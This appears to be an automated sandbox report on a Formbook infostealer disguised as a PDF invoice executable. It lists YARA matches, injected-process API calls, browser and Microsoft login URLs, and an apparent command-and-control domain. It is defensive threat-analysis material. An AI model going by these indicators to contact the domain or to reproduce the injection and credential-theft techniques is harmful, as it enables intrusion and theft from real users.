Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: fFUkGixTNm.exe, 00000009.00000002.2932524352.000000000590D000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.resellnexa.shop
Source: fFUkGixTNm.exe, 00000009.00000002.2932524352.000000000590D000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.resellnexa.shop/sfpe/
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033y
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: RpcPing.exe, 00000008.00000003.2428440920.00000000084B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

barindex
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: initial sample Static PE information: Filename: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: initial sample Static PE information: Filename: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0042BFF3 NtClose, 3_2_0042BFF3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52B60 NtClose,LdrInitializeThunk, 3_2_01A52B60
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52DF0 NtQuerySystemInformation,LdrInitializeThunk, 3_2_01A52DF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52C70 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_01A52C70
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A535C0 NtCreateMutant,LdrInitializeThunk, 3_2_01A535C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A54340 NtSetContextThread, 3_2_01A54340
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A54650 NtSuspendThread, 3_2_01A54650
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52BA0 NtEnumerateValueKey, 3_2_01A52BA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52B80 NtQueryInformationFile, 3_2_01A52B80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52BE0 NtQueryValueKey, 3_2_01A52BE0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52BF0 NtAllocateVirtualMemory, 3_2_01A52BF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52AB0 NtWaitForSingleObject, 3_2_01A52AB0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52AF0 NtWriteFile, 3_2_01A52AF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52AD0 NtReadFile, 3_2_01A52AD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52DB0 NtEnumerateKey, 3_2_01A52DB0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52DD0 NtDelayExecution, 3_2_01A52DD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52D30 NtUnmapViewOfSection, 3_2_01A52D30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52D00 NtSetInformationFile, 3_2_01A52D00
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52D10 NtMapViewOfSection, 3_2_01A52D10
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52CA0 NtQueryInformationToken, 3_2_01A52CA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52CF0 NtOpenProcess, 3_2_01A52CF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52CC0 NtQueryVirtualMemory, 3_2_01A52CC0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52C00 NtQueryInformationProcess, 3_2_01A52C00
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52C60 NtCreateKey, 3_2_01A52C60
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52FA0 NtQuerySection, 3_2_01A52FA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52FB0 NtResumeThread, 3_2_01A52FB0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52F90 NtProtectVirtualMemory, 3_2_01A52F90
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52FE0 NtCreateFile, 3_2_01A52FE0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52F30 NtCreateSection, 3_2_01A52F30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52F60 NtCreateProcessEx, 3_2_01A52F60
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52EA0 NtAdjustPrivilegesToken, 3_2_01A52EA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52E80 NtReadVirtualMemory, 3_2_01A52E80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52EE0 NtQueueApcThread, 3_2_01A52EE0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52E30 NtWriteVirtualMemory, 3_2_01A52E30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A53090 NtSetValueKey, 3_2_01A53090
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A53010 NtOpenDirectoryObject, 3_2_01A53010
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A539B0 NtGetContextThread, 3_2_01A539B0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A53D10 NtOpenProcessToken, 3_2_01A53D10
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A53D70 NtOpenThread, 3_2_01A53D70
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A54340 NtSetContextThread,LdrInitializeThunk, 8_2_03A54340
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A54650 NtSuspendThread,LdrInitializeThunk, 8_2_03A54650
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52BA0 NtEnumerateValueKey,LdrInitializeThunk, 8_2_03A52BA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52BE0 NtQueryValueKey,LdrInitializeThunk, 8_2_03A52BE0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_03A52BF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52B60 NtClose,LdrInitializeThunk, 8_2_03A52B60
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52AF0 NtWriteFile,LdrInitializeThunk, 8_2_03A52AF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52AD0 NtReadFile,LdrInitializeThunk, 8_2_03A52AD0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52FB0 NtResumeThread,LdrInitializeThunk, 8_2_03A52FB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52FE0 NtCreateFile,LdrInitializeThunk, 8_2_03A52FE0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52F30 NtCreateSection,LdrInitializeThunk, 8_2_03A52F30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52E80 NtReadVirtualMemory,LdrInitializeThunk, 8_2_03A52E80
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52EE0 NtQueueApcThread,LdrInitializeThunk, 8_2_03A52EE0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_03A52DF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52DD0 NtDelayExecution,LdrInitializeThunk, 8_2_03A52DD0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52D30 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_03A52D30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52D10 NtMapViewOfSection,LdrInitializeThunk, 8_2_03A52D10
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52CA0 NtQueryInformationToken,LdrInitializeThunk, 8_2_03A52CA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52C60 NtCreateKey,LdrInitializeThunk, 8_2_03A52C60
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_03A52C70
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A535C0 NtCreateMutant,LdrInitializeThunk, 8_2_03A535C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A539B0 NtGetContextThread,LdrInitializeThunk, 8_2_03A539B0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52B80 NtQueryInformationFile, 8_2_03A52B80
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52AB0 NtWaitForSingleObject, 8_2_03A52AB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52FA0 NtQuerySection, 8_2_03A52FA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52F90 NtProtectVirtualMemory, 8_2_03A52F90
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52F60 NtCreateProcessEx, 8_2_03A52F60
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52EA0 NtAdjustPrivilegesToken, 8_2_03A52EA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52E30 NtWriteVirtualMemory, 8_2_03A52E30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52DB0 NtEnumerateKey, 8_2_03A52DB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52D00 NtSetInformationFile, 8_2_03A52D00
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52CF0 NtOpenProcess, 8_2_03A52CF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52CC0 NtQueryVirtualMemory, 8_2_03A52CC0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A52C00 NtQueryInformationProcess, 8_2_03A52C00
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A53090 NtSetValueKey, 8_2_03A53090
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A53010 NtOpenDirectoryObject, 8_2_03A53010
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A53D10 NtOpenProcessToken, 8_2_03A53D10
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A53D70 NtOpenThread, 8_2_03A53D70
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03288B30 NtReadFile, 8_2_03288B30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_032889D0 NtCreateFile, 8_2_032889D0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03288E20 NtAllocateVirtualMemory, 8_2_03288E20
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03288C20 NtDeleteFile, 8_2_03288C20
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03288CC0 NtClose, 8_2_03288CC0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_00D6D5BC 0_2_00D6D5BC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E8350 0_2_070E8350
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E2208 0_2_070E2208
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E42E0 0_2_070E42E0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E1DD0 0_2_070E1DD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E3A08 0_2_070E3A08
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E1998 0_2_070E1998
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00418163 3_2_00418163
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_004030C0 3_2_004030C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_004011D0 3_2_004011D0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00401A70 3_2_00401A70
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040FA7A 3_2_0040FA7A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_004022F7 3_2_004022F7
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040FA83 3_2_0040FA83
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00416340 3_2_00416340
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00416343 3_2_00416343
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00402300 3_2_00402300
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_004024E0 3_2_004024E0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040FCA3 3_2_0040FCA3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040DD20 3_2_0040DD20
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040DD23 3_2_0040DD23
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0042E5F3 3_2_0042E5F3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040DE69 3_2_0040DE69
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AE01AA 3_2_01AE01AA
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD41A2 3_2_01AD41A2
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD81CC 3_2_01AD81CC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A10100 3_2_01A10100
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABA118 3_2_01ABA118
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AA8158 3_2_01AA8158
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AB2000 3_2_01AB2000
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AE03E6 3_2_01AE03E6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A2E3F0 3_2_01A2E3F0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADA352 3_2_01ADA352
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AA02C0 3_2_01AA02C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AC0274 3_2_01AC0274
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AE0591 3_2_01AE0591
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A20535 3_2_01A20535
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ACE4F6 3_2_01ACE4F6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AC4420 3_2_01AC4420
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD2446 3_2_01AD2446
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A1C7C0 3_2_01A1C7C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A20770 3_2_01A20770
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A44750 3_2_01A44750
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3C6E0 3_2_01A3C6E0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A229A0 3_2_01A229A0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AEA9A6 3_2_01AEA9A6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A36962 3_2_01A36962
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A068B8 3_2_01A068B8
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A4E8F0 3_2_01A4E8F0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A22840 3_2_01A22840
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A2A840 3_2_01A2A840
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD6BD7 3_2_01AD6BD7
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADAB40 3_2_01ADAB40
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A1EA80 3_2_01A1EA80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A38DBF 3_2_01A38DBF
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A1ADE0 3_2_01A1ADE0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A2AD00 3_2_01A2AD00
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABCD1F 3_2_01ABCD1F
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AC0CB5 3_2_01AC0CB5
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A10CF2 3_2_01A10CF2
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A20C00 3_2_01A20C00
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A9EFA0 3_2_01A9EFA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A12FC8 3_2_01A12FC8
